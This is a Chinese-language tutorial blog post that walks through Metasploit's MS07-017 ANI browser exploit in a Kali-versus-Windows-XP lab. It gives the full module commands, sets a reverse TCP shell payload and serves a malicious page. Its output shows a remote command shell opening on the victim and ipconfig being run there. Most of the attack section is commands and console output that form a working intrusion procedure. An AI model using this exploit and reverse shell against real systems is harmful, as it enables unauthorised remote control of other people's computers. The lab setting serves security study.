msf payload使用


一、Passive Exploit(浏览器访问攻击)

环境:

kali :10.0.0.132

windows XP :10.0.0.106

1、创建payload

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize 
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 10.0.0.132
SRVHOST => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lhost 10.0.0.132
lhost => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.0.0.132       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.132       yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista


msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.0.132:4444 
[*] Using URL: http://10.0.0.132:80/
[*] Server started.
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >

  

2、在windows XP机器上访问

3、查看kali

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending HTML page
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.106
[*] Command shell session 1 opened (10.0.0.132:4444 -> 10.0.0.106:1069) at 2019-05-07 10:00:18 +0800

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               10.0.0.132:4444 -> 10.0.0.106:1069 (10.0.0.106)

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [°汾 5.1.2600]
(C) °爨?? 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\??>ipconfig 
ipconfig 

Windows IP Configuration


Ethernet adapter ±??????

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 10.0.0.106
        Subnet Mask . . . . . . . . . . . : 255.0.0.0
        Default Gateway . . . . . . . . . : 10.0.0.254

Ethernet adapter Bluetooth θ?l??

        Media State . . . . . . . . . . . : Media disconnected

  

优质内容筛选与推荐>>
1、autoburn eMMC hacking
2、(一)走进JavaWeb的世界 -------JavaWeb的学习之路
3、flume安装和使用
4、java Random类详解
5、Design Pattern: Strategy


长按二维码向我转账

受苹果公司新规定影响,微信 iOS 版的赞赏功能被关闭,可通过二维码转账支持公众号。

    阅读
    好看
    已推荐到看一看
    你的朋友可以在“发现”-“看一看”看到你认为好看的文章。
    已取消,“好看”想法已同步删除
    已推荐到看一看 和朋友分享想法
    最多200字,当前共 发送

    已发送

    朋友将在看一看看到

    确定
    分享你的想法...
    取消

    分享想法到看一看

    确定
    最多200字,当前共

    发送中

    网络异常,请稍后重试

    微信扫一扫
    关注该公众号





    联系我们

    欢迎来到TinyMind。

    关于TinyMind的内容或商务合作、网站建议,举报不良信息等均可联系我们。

    TinyMind客服邮箱:support@tinymind.net.cn